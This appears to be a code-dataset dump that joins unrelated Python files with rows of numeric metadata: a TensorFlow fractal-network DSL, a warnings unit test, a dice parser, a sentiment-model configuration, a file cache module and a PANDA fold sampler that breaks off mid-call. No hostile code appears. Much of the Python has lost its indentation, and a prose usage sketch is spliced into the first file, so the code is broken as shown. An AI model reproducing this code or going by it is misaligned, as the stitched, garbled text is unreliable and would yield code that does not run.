if isinstance(incoming, TFComponentVal) and (not hasattr(self, 'noDirect')):
incoming = incoming.resolve()
net = self.get(incoming, opts, componentInherit)
        if isinstance(net, TFComponentVal) and componentInherit['parentType'] == '':
net = net.resolve()
componentInherit = inheritBak
return net
class TFComponentVal:
pass
class Identity(TFComponent):
def __init__(self, **kwargs):
self.noDirect = True
self.opts = {
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
return incoming
class Sequence(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Sequence"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for blk in self.blocks:
resnet = blk[resnet]
return resnet
class ParallelVal(TFComponentVal):
def __init__(self, opts, inherit, scope):
self.blocks = list()
self.opts = opts
self.inherit = inherit
self.scope = scope
def resolve(self):
opts = self.opts
inherit = self.inherit
with tf.name_scope(self.scope):
is_training = tflearn.get_training_mode()
blocks = tf.pack(self.blocks)
basic = tf.reduce_sum(blocks, 0)
oneChoice = tf.random_uniform([], maxval=len(self.blocks), dtype='int32')
one = tf.cond(is_training, lambda: tf.gather(blocks,oneChoice), lambda: basic)
someChoice = tf.less(tf.random_uniform([len(self.blocks)]), inherit['localDroppathProb'])
some = tf.cond(is_training, lambda: tf.reduce_sum(tf.boolean_mask(blocks,someChoice), 0), lambda: basic)
some = tf.cond(tf.reduce_any(someChoice), lambda: some, lambda: one)
resnet = condition(inherit['globalDroppath'], one, condition(inherit['localDroppath'], some, basic))
return resnet
class Parallel(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Parallel"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name) as scope:
blocksMixed = [blk[resnet] for blk in self.blocks]
blocks = ParallelVal(opts, inherit, scope)
for blk in blocksMixed:
if isinstance(blk, ParallelVal):
blocks.blocks = blocks.blocks + blk.blocks
else:
blocks.blocks.append(blk)
return blocks
class Chain(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Chain"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for i in range(self.size):
resnet = self.block[resnet]
return resnet
class Fractal(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Fractal"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
if self.size <= 1:
return self.block[resnet]
else:
sub = Fractal(self.size-1, self.block)
resnet = Parallel([self.block, Chain(2, sub)])[resnet]
return resnet
class Residual(TFComponent):
def __init__(self, block, **kwargs):
self.noDirect = True
self.block = block
self.opts = {
'name': "Residual"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
            resnet = Parallel([Identity(), self.block])[resnet]
return resnet
class Conv2d(TFComponent):
def __init__(self, nb_filter, filter_size, **kwargs):
self.nb_filter = nb_filter
self.filter_size = filter_size
self.opts = {
'strides': 1,
'padding': 'same',
'activation': 'linear',
'bias': True,
'weights_init': 'uniform_scaling',
'bias_init': 'zeros',
'regularizer': None,
'weight_decay': 0.001,
'trainable': True,
'restore': True,
'name': "Conv2D"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
        assert opts.padding in ['same', 'valid', 'SAME', 'VALID'], \
            "Padding must be 'same' or 'valid'"
input_shape = utils.get_incoming_shape(incoming)
assert len(input_shape) == 4, "Incoming Tensor shape must be 4-D"
filter_size = utils.autoformat_filter_conv2d(self.filter_size,
input_shape[-1],
self.nb_filter)
strides = utils.autoformat_kernel_2d(opts.strides)
padding = utils.autoformat_padding(opts.padding)
with tf.name_scope(opts.name) as scope:
W_init = opts.weights_init
if isinstance(opts.weights_init, str):
W_init = initializations.get(opts.weights_init)()
W_regul = None
if opts.regularizer:
W_regul = lambda x: losses.get(opts.regularizer)(x, opts.weight_decay)
W = vs.variable(scope + 'W', shape=filter_size,
regularizer=W_regul, initializer=W_init,
trainable=opts.trainable, restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, W)
b = None
if opts.bias:
b_init = initializations.get(opts.bias_init)()
b = vs.variable(scope + 'b', shape=self.nb_filter,
initializer=b_init, trainable=opts.trainable,
restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, b)
inference = tf.nn.conv2d(incoming, W, strides, padding)
            if b is not None: inference = tf.nn.bias_add(inference, b)
if isinstance(opts.activation, str):
inference = activations.get(opts.activation)(inference)
            elif hasattr(opts.activation, '__call__'):
                inference = opts.activation(inference)
else:
raise ValueError("Invalid Activation.")
# Track activations.
tf.add_to_collection(tf.GraphKeys.ACTIVATIONS, inference)
# Add attributes to Tensor to easy access weights.
inference.scope = scope
inference.W = W
inference.b = b
return inference
class ShallowResidualBlock(TFComponent):
def __init__(self, out_channels, **kwargs):
self.out_channels = out_channels
self.opts = {
'downsample': False,
'downsample_strides': 2,
'activation': 'relu',
'batch_norm': True,
'bias': True,
'weights_init': 'variance_scaling',
'bias_init': 'zeros',
'regularizer': 'L2',
'weight_decay': 0.0001,
'trainable': True,
'restore': True,
'name': 'ResidualBlock'
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
in_channels = incoming.get_shape().as_list()[-1]
with tf.name_scope(opts.name):
identity = resnet
            if not opts.downsample:
opts.downsample_strides = 1
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
resnet = conv_2d(resnet, self.out_channels, 3,
opts.downsample_strides, 'same', 'linear',
opts.bias, opts.weights_init, opts.bias_init,
opts.regularizer, opts.weight_decay, opts.trainable,
opts.restore)
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
resnet = conv_2d(resnet, self.out_channels, 3, 1, 'same',
'linear', opts.bias, opts.weights_init,
opts.bias_init, opts.regularizer, opts.weight_decay,
opts.trainable, opts.restore)
# Downsampling
if opts.downsample_strides > 1:
identity = tflearn.avg_pool_2d(identity, 1,
opts.downsample_strides)
# Projection to new dimension
if in_channels != self.out_channels:
ch = (self.out_channels - in_channels)//2
identity = tf.pad(identity,
[[0, 0], [0, 0], [0, 0], [ch, ch]])
in_channels = self.out_channels
            resnet = resnet + identity
return resnet
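A hedged composition sketch for the component DSL above. It assumes the componentInherit droppath defaults and the condition() helper defined earlier in this file, plus the tflearn helper imports at the top of the file and the TF 0.x-era APIs (e.g. tf.pack) the file targets:

    import tensorflow as tf
    import tflearn

    net = tflearn.input_data(shape=[None, 32, 32, 3])
    block = Sequence([Conv2d(16, 3, activation='relu'),
                      Conv2d(16, 3, activation='relu')])
    net = Fractal(3, block, localDroppath=True)[net]   # components apply via []
    net = Residual(Conv2d(16, 3))[net]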
| 34.182099
| 116
| 0.557562
| 1,131
| 11,075
| 5.312997
| 0.168877
| 0.033283
| 0.018306
| 0.029289
| 0.339324
| 0.300549
| 0.275254
| 0.275254
| 0.269096
| 0.269096
| 0
| 0.006302
| 0.340948
| 11,075
| 323
| 117
| 34.287926
| 0.816961
| 0.018781
| 0
| 0.3
| 0
| 0
| 0.066218
| 0
| 0
| 0
| 0
| 0
| 0.007692
| 1
| 0.080769
| false
| 0.003846
| 0.030769
| 0.003846
| 0.211538
| 0.003846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1f9c0eee8a8c52481a3d1792850e6310a0a8163
| 1,984
|
py
|
Python
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 421
|
2015-06-02T16:29:59.000Z
|
2021-06-03T18:44:42.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 404
|
2015-06-02T20:23:42.000Z
|
2019-08-21T16:59:41.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 16
|
2015-06-16T17:21:02.000Z
|
2020-03-27T02:27:09.000Z
|
from ..testcases import DustyTestCase
from dusty.warnings import Warnings
class TestWarnings(DustyTestCase):
def setUp(self):
super(TestWarnings, self).setUp()
self.warnings = Warnings()
def test_warn(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Yo this thing is also wrong'
self.warnings.warn('test', message_1)
        self.assertEqual(self.warnings._stored, {'test': [message_1]})
        self.warnings.warn('test', message_2)
        self.assertEqual(self.warnings._stored, {'test': [message_1, message_2]})
def test_has_warnings(self):
self.assertFalse(self.warnings.has_warnings)
self.warnings.warn('test', 'yo')
self.assertTrue(self.warnings.has_warnings)
def test_pretty_with_no_warnings(self):
self.assertEqual(self.warnings.pretty(), "")
def test_pretty(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Something is very wrong, and that something takes way more than 80 characters to communicate the fact that it is wrong'
self.warnings.warn('test', message_1)
self.warnings.warn('test', message_2)
self.assertEqual(self.warnings.pretty(), "WARNING (test): Something is wrong, yo\nWARNING (test): Something is very wrong, and that something takes way more than 80 characters to\ncommunicate the fact that it is wrong\n")
def test_clear_namespace(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('test')
self.assertEqual(len(self.warnings._stored['test']), 0)
def test_clear_namespace_leaves_others_unaffected(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('some-other-namespace')
self.assertEqual(len(self.warnings._stored['test']), 1)
| 45.090909
| 229
| 0.689516
| 257
| 1,984
| 5.182879
| 0.233463
| 0.18018
| 0.084084
| 0.105105
| 0.63964
| 0.576577
| 0.5503
| 0.52027
| 0.385886
| 0.328829
| 0
| 0.011823
| 0.19002
| 1,984
| 43
| 230
| 46.139535
| 0.81705
| 0
| 0
| 0.314286
| 0
| 0.057143
| 0.245968
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 1
| 0.2
| false
| 0
| 0.057143
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1fa3f6469623ef44f7b253d9c5da8307b330081
| 4,655
|
py
|
Python
|
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
from random import randint
import re
# Supported formats:
# [A]dX[(L|H|K)n][.Y1[.Y2[...]]]
# A - number of dice
# X - number of sides of dice
# . - operation: allowed are + - * x /
# Ln/Hn/Kn - discard the Lowest n dice or Keep the Highest n dice. - will only apply the first of these, in order LHK
# Y1,Y2,... - operand
# warning: doesn't respect order of operations. So +5*3 will first add 5, then multiply by 3.
# example: 4d6+3 rolls 4 dice with 6 faces each, afterwards adds 3.
# Thanks to tara, maximum number of allowed dice/faces is 999.
# Parse a single dice roll
def randomDice(dice):
try:
# Format for the whole roll
        diceexp = re.compile(r'(?:\D+)?(\d{0,3})d(\d{1,3})((([\+\-\*x\/LHK])(\d+))+)?', re.IGNORECASE)
        # Format for modifiers
        addsexp = re.compile(r'[\+\-\*x\/LHK]\d+', re.IGNORECASE)
        numexp = re.compile(r'(\d+)')
m = diceexp.match(dice)
# Result of rolls
result = 0
rolls = []
# Weird input?
if not m:
return 0
# Get the number of dice to roll
dicenum = 0
        if m.group(1) == "" or m.group(1) is None:
dicenum = 1
else:
dicenum = int(m.group(1))
# Get the number of faces on each dice
facenum = int(m.group(2))
# Roll the dice
for i in range(dicenum):
rolls.append(randint(1,facenum))
# result += randint(1,facenum)
# sort the rolls for further processing
rolls.sort()
if 'l' in dice.lower():
index = dice.lower().find('l') + 1
number = int(numexp.match(dice[index:]).group())
            # Can't drop more dice than available; everything is dropped, so the total is 0
if number > dicenum:
return 0
for i in range(number,len(rolls)):
result += rolls[i]
elif 'h' in dice.lower():
index = dice.lower().find('h') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
elif 'k' in dice.lower():
index = dice.lower().find('k') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
else:
for i in range(len(rolls)):
result += rolls[i]
# Any modifiers present?
        if m.group(3) is not None:
# Split them up
n = addsexp.findall(m.group(3))
# Modifiers
for i in range(len(n)):
# Value of modifier
modval = int(n[i][1:])
# Type of modifier
if n[i][0] == '+':
result += modval
elif n[i][0] == '-':
result -= modval
elif n[i][0] in '*x':
result *= modval
elif n[i][0] == '/':
result /= modval
return result
except:
return None
# Parse a whole expression.
#
# Format: dice1[+dice2[+dice3[...]]]
# dice1, dice2, dice3, ...: Any valid dice format as written in the randomDice function.
#
# Returns: The total of all rolls as integer, None if there was no valid dice notation found
def dnDice(dice):
# Pattern
    diceexp1 = re.compile(r'(\d{0,3}d\d{1,3})(([\+\-\*x\/HLK]\d+(?!d))+)?', re.IGNORECASE)
# Total roll
total = 0
results = diceexp1.findall(dice)
if len(results) == 0:
return None
else:
# Total up the rolls
        for d in results:
            # Each findall() match is a tuple of groups; the last group is a
            # duplicate of the final modifier, so drop it and join the rest
            # back together (the modifiers get split off into their own group)
            string = "".join(d[:-1])
            t = randomDice(string)
            if t is None:
                return None
            total += t
return total
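A brief usage sketch for the parser above (outputs vary, since the rolls are random):

    if __name__ == '__main__':
        print(dnDice('4d6+3'))      # roll 4d6, then add 3
        print(dnDice('2d20H1'))     # roll two d20s, keep the highest
        print(dnDice('1d8+1d6+2'))  # two dice groups plus a flat modifier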
| 34.738806
| 140
| 0.478195
| 566
| 4,655
| 3.932862
| 0.293286
| 0.016173
| 0.016173
| 0.02965
| 0.293801
| 0.268194
| 0.248877
| 0.194519
| 0.173405
| 0.154987
| 0
| 0.020166
| 0.403437
| 4,655
| 133
| 141
| 35
| 0.781419
| 0.299033
| 0
| 0.35
| 0
| 0.025
| 0.042058
| 0.031705
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025
| false
| 0
| 0.025
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1fbbda465699c148d64aca8b6b9736f618761e2
| 2,471
|
py
|
Python
|
cfg/configure_model.py
|
dadelani/sentiment-discovery
|
0cbfc5f6345dacbf52f1f806a9e136a61ca35cf8
|
[
"BSD-3-Clause"
] | 2
|
2019-04-24T08:23:54.000Z
|
2020-06-24T10:25:34.000Z
|
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | null | null | null |
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | 1
|
2019-03-23T08:07:33.000Z
|
2019-03-23T08:07:33.000Z
|
import os
from sentiment_discovery.reparameterization import remove_weight_norm
from sentiment_discovery.model import make_model
class ModuleConfig(object):
def __init__(self, parser):
super(ModuleConfig, self).__init__()
self.parser = parser
def apply(self, cfg, opt):
"""make model and format model path for reloading parameters"""
print('configuring model')
cell_type = opt.rnn_type
num_layers = opt.layers
embed_size = opt.embed_size
hidden_size = opt.rnn_size
# set in configure_data
data_size = opt.data_size
dropout = opt.dropout
w_norm = opt.weight_norm
lstm_only = opt.lstm_only
saved_path = ''
if opt.load_model != '':
model_dir = cfg.logger.get_log_dir(opt.model_dir)
saved_path = os.path.join(model_dir, opt.load_model)
print(embed_size)
model, recurrent_module, embedder_module, chkpt = make_model(
cell_type=cell_type, num_layers=num_layers,
embed_size=embed_size, hidden_size=hidden_size,
data_size=data_size, dropout=dropout, weight_norm=w_norm,
lstm_only=lstm_only, saved_path=saved_path)
cfg.model = model
cfg.chkpt = chkpt
nParams = sum([p.nelement() for p in cfg.model.parameters()])
print('* number of parameters: %d' % nParams)
def configure_model(parser):
"""add cmdline args for configuring models"""
parser.add_argument('-load_model', default='',
help="""a specific checkpoint file to load from experiment's model directory""")
parser.add_argument('-should_test', action='store_true',
help='whether to train or evaluate a model')
parser.add_argument('-model_dir', default='model',
help='directory where models are saved to/loaded from')
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the rnn')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=64,
help='Size of embeddings')
parser.add_argument('-weight_norm', action='store_true',
help='whether to use weight normalization for training NNs')
parser.add_argument('-lstm_only', action='store_true',
                        help='if `-weight_norm` is applied to the model, apply it to the lstm parameters only')
parser.add_argument('-dropout', type=float, default=0.1,
help='Dropout probability.')
return ModuleConfig(parser)
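A hedged wiring sketch for this module; the cfg object comes from the project's broader configuration setup, so the final apply() call is stubbed here:

    import argparse

    parser = argparse.ArgumentParser()
    module_config = configure_model(parser)   # registers -load_model, -rnn_type, ... flags
    opt = parser.parse_args(['-rnn_type', 'mlstm', '-layers', '1'])
    # module_config.apply(cfg, opt)           # cfg is supplied by the surrounding framework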
| 39.854839
| 93
| 0.718737
| 352
| 2,471
| 4.821023
| 0.321023
| 0.058338
| 0.100177
| 0.033589
| 0.032999
| 0.032999
| 0
| 0
| 0
| 0
| 0
| 0.004369
| 0.166329
| 2,471
| 61
| 94
| 40.508197
| 0.819417
| 0.048563
| 0
| 0
| 0
| 0
| 0.248793
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0.056604
| 0
| 0.150943
| 0.056604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
f1ff198ad462185fb2910c252e87000aebf824f5
| 6,351
|
py
|
Python
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | 2
|
2021-01-11T20:09:32.000Z
|
2021-05-14T14:52:48.000Z
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
from os import listdir, remove, makedirs
from os.path import isfile, join, exists
import shutil
import joblib
from termcolor import cprint
import json
from pathlib import Path
_cache_path = None
_log_actions = True
def init(cache_path, log_actions=True):
"""
Initializes the cache.
Keyword Arguments:
- cache_path: directory where cached files are saved
- log_actions: when true, all actions are logged
"""
global _cache_path, _log_actions
_log_actions = log_actions
_cache_path = cache_path
try:
if not exists(cache_path):
makedirs(cache_path)
except Exception as e:
cprint(e, 'red')
def write(filename, data):
"""
Pickles a file and writes it to the cache.
Keyword Arguments:
- filename: name of the file to write to
- data: object to cache
"""
if _log_actions:
cprint('Writing to cache: "{}"'.format(filename), 'green')
joblib.dump(data, join(_cache_path, filename))
def write_plain(filename, data, add_extension=True):
"""
Simply writes the textual data to a file.
"""
if _log_actions:
cprint('Writing to cache (plain): "{}"'.format(filename), 'green')
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(data)
def write_dict_json(filename, data, add_extension=True):
"""
Writes a dictionary to file using JSON format.
"""
if _log_actions:
cprint('Writing to cache (json): "{}"'.format(filename), 'green')
json_string = json.dumps(data, sort_keys=False, indent=4)
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(json_string)
def read(filename):
"""
Reads a file from the cache and unpickles it.
Keyword Arguments:
- filename: name of the file to read
Returns:
- data: unpickled object
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return joblib.load(join(_cache_path, filename))
def read_multiple(filenames):
"""
Reads multiple file from the cache and unpickles them.
Keyword Arguments:
- filenames: names of the files to read
Returns:
- result: unpickled object
- success_files: list of successful filenames
- errors: filenames for which exceptions happened
"""
result = []
success_files = []
errors = []
for f in filenames:
try:
result.append(read(f))
success_files.append(f)
except Exception as e:
cprint(f'Loading {f} failed!', 'red')
cprint(e, 'red')
errors.append(f)
return result, success_files, errors
def read_plain(filename):
"""
    Reads a plain-text file from the cache.
    Keyword Arguments:
    - filename: name of the file to read
    Returns:
    - data: file contents as a string
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return Path(join(_cache_path, filename)).read_text()
def delete(filename):
"""
Removes all files from the cache that have names starting with filename.
"""
deleted = 0
errors = 0
for f in entries():
try:
if f.startswith(filename):
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {filename}', 'red')
errors += 1
cprint(f'Removed from cache all files starting with {filename}', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def delete_all_clf_projs():
"""
Deletes all classifier projections
"""
deleted = 0
errors = 0
for f in entries():
try:
if '__clf_proj_' in f:
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {f}', 'red')
errors += 1
    cprint('Removed from cache all classifier projections', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def clear():
"""
Deletes the cache.
"""
cprint('Clearing cache', 'yellow')
shutil.rmtree(_cache_path, ignore_errors=True)
def entries():
"""
Lists all files in the cache.
Returns:
- list of all file names in the cache directory
"""
return [f for f in listdir(_cache_path) if isfile(join(_cache_path, f))]
def content():
"""
Returns all .json files in the cache to allow showing what
classifiers etc. have been trained so far.
Returns:
- a dictionary containing all files' contents
"""
cached_files = entries()
json_files = [f for f in cached_files if f.endswith('_args.json')]
datasets = []
classifiers = []
projections = []
classifier_projections = []
for f in json_files:
try:
filepath = join(_cache_path, f)
contents = Path(filepath).read_text()
json_dict = {
'file': f,
'args': json.loads(contents)
}
if '__proj_' in f:
projections.append(json_dict)
elif '__clf_proj_' in f:
classifier_projections.append(json_dict)
elif '__clf_' in f:
# send scores for cached classifications
score_file = f.replace('_args.json', '_scores.json')
scores = Path(join(_cache_path, score_file)).read_text()
json_dict['scores'] = json.loads(scores)
classifiers.append(json_dict)
elif f.startswith('data_'):
datasets.append(json_dict)
except Exception as e:
cprint(
                f'Error: Some related files may be missing for file {f}; check that you copied files correctly or run your jobs again!', 'red')
cprint(e, 'red')
return {
'datasets': datasets,
'classifiers': classifiers,
'projections': projections,
'classifier_projections': classifier_projections
}
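A hedged round-trip example for this module (the import path and cache directory are assumptions):

    from modules import cache  # import path is an assumption

    cache.init('/tmp/demo_cache', log_actions=False)
    cache.write('model_1.pkl', {'weights': [1, 2, 3]})
    restored = cache.read('model_1.pkl')                 # {'weights': [1, 2, 3]}
    cache.write_dict_json('model_1_args', {'lr': 0.01})  # adds the .json extension
    print(cache.entries())                               # lists both cached files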
| 26.352697
| 140
| 0.597859
| 767
| 6,351
| 4.805737
| 0.221643
| 0.048833
| 0.035269
| 0.024417
| 0.363266
| 0.32854
| 0.290016
| 0.263972
| 0.253391
| 0.233858
| 0
| 0.002462
| 0.296489
| 6,351
| 240
| 141
| 26.4625
| 0.822516
| 0.204377
| 0
| 0.362963
| 0
| 0.007407
| 0.163453
| 0.00461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0
| 0.051852
| 0
| 0.192593
| 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b00a8aae5f5c462bd8742df1743968940cbb675
| 8,123
|
py
|
Python
|
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | 1
|
2021-04-20T04:37:47.000Z
|
2021-04-20T04:37:47.000Z
|
import torch
import os
import numpy as np
import random
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from data.tileimages import *
from data.multitask import *
import fastai
from fastai.vision import *
class FoldSampler:
def __init__(self, TRAIN, LABELS,
mean, std, N,
tfms=[], sz=128,bs=16,
n_folds=4, uniform_augmentations=False,
shuffle_nonempty_imgs=False,
model_name=None,
is_train=True,
is_ordinal=False,
SEED=2020,
num_workers=4):
self._seed_everything(SEED)
self.SEED = SEED
self.tfms = tfms
self.mean = mean
self.std = std
self.N = N
self.nfolds = n_folds
self.TRAIN = TRAIN
self.sz = sz
self.bs = bs
self.is_ordinal = is_ordinal
self.is_train=is_train
self.num_workers=num_workers
self.model_name = model_name
self.uniform_augmentations = uniform_augmentations
self.shuffle_nonempty_imgs = shuffle_nonempty_imgs
self._prepare_data(TRAIN, LABELS)
self.df.head()
def _seed_everything(self, seed):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
        torch.backends.cudnn.benchmark = False  # benchmarking selects non-deterministic algorithms
def _cats4slide(self, image_id):
fn_cats = os.path.join(self.TRAIN, f'{image_id}_mask.txt')
if os.path.isfile(fn_cats):
with open(fn_cats) as f:
return [int(int(l)>1) for l in f.readlines()]
else:
raise Exception("File not found", str(fn_cats))
def _findAllReplicates(self, pairs, seed):
replicates = [seed]
nodes = [seed]
def addReplicate(n):
if n not in replicates:
replicates.append(n)
nodes.append(n)
# while there are nodes left
while len(nodes) > 0:
this_node = nodes[0]
for i,j in pairs:
if i==this_node:
# match - add j to replicates
addReplicate(j)
elif j==this_node:
# match - add i to replicates
addReplicate(i)
nodes.pop(0)
return replicates
def _pairs2sameFolds(self, df,pairs):
replicate_indices = np.unique(pairs)
split_values = df.split.values
for ind in replicate_indices:
allReps = self._findAllReplicates(list(pairs), ind)
# set all to the same fold as the minimum index
min_rep = min(allReps)
target_fold = split_values[min_rep]
for rep in allReps:
split_values[rep] = target_fold
df.split = split_values
return df
def _prepare_data(self, TRAIN, LABELS):
df = pd.read_csv(LABELS).set_index('image_id')
files = set([p[:32] for p in os.listdir(TRAIN)])
df = df.loc[files]
df = df.reset_index()
df['stratify'] = df.data_provider.map(str) + '-' + df.isup_grade.map(str)
splits = StratifiedKFold(n_splits=self.nfolds, random_state=self.SEED, shuffle=True)
splits = list(splits.split(df,df.stratify))
        folds_splits = np.zeros(len(df)).astype(int)
for i in range(self.nfolds): folds_splits[splits[i][1]] = i
df['split'] = folds_splits
if self.is_ordinal:
def _transform_ordinal(label):
#return ','.join([str(i) for i in range(int(label) + 1)])
return ','.join([str(i) for i in range(int(label))])
df.isup_grade = df.isup_grade.apply(_transform_ordinal)
# add tile cancer categories if present in train data
if self.model_name in ["multihead_tilecat", "multihead_tilecat_attention"]:
cancer_labels = np.array([np.array(self._cats4slide(image_id)) for image_id in df.image_id.values])
for i in range(cancer_labels.shape[1]):
df[f'cancer_status_{i}'] = list(cancer_labels[:,i])
# set serial section replicates to same folds
pairs_fn = os.path.join('../','pair_indices.npy')
if os.path.exists(pairs_fn):
pairs = np.load(pairs_fn)
print(f'Setting {np.array(pairs).shape[0]} serial section replicates to same folds')
df = self._pairs2sameFolds(df, pairs)
self.df = df
def get_data(self,fold=0, **kwargs):
model_name = "iafoss" if self.model_name is None else self.model_name
regr = "regr" in model_name
def __MImageItemList():
""" This returns MImageItemList with specified defaults """
return MImageItemList.from_df(self.df,
path='.',
folder=self.TRAIN,
cols='image_id',
sz=self.sz,
N=self.N,
mean=self.mean,
std=self.std,
uniform_augmentations=self.uniform_augmentations,
